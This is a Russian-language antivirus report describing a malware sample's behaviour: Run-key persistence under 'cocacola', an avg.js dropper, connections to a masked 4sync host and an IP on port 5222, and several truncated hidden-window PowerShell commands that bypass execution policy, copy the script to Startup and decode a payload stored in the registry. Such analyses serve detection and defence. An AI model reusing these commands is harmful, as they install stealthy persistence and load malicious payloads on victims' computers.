Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Run] 'cocacola' = '%APPDATA%\avg.js'
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\avg.js
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '<SYSTEM32>\wscript.exe' "%APPDATA%\avg.js"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'cocacola' -value '%APPDATA%\avg.js' -PropertyTy...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\avg.js
Сетевая активность
Подключается к
- 'dc###.4sync.com':443
- '54.##6.241.16':5222
TCP
Другие
- 'dc###.4sync.com':443
- '54.##6.241.16':5222
UDP
- DNS ASK dc###.4sync.com
Другое
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\avg.js',[System.IO.File]::ReadAllText('%APPDATA%\avg.js'))" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;$_b=$_b.replace('~','0');[byte[]]$_0 = [System... (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'cocacola' -value '%APPDATA%\avg.js' -PropertyTy... (со скрытым окном)
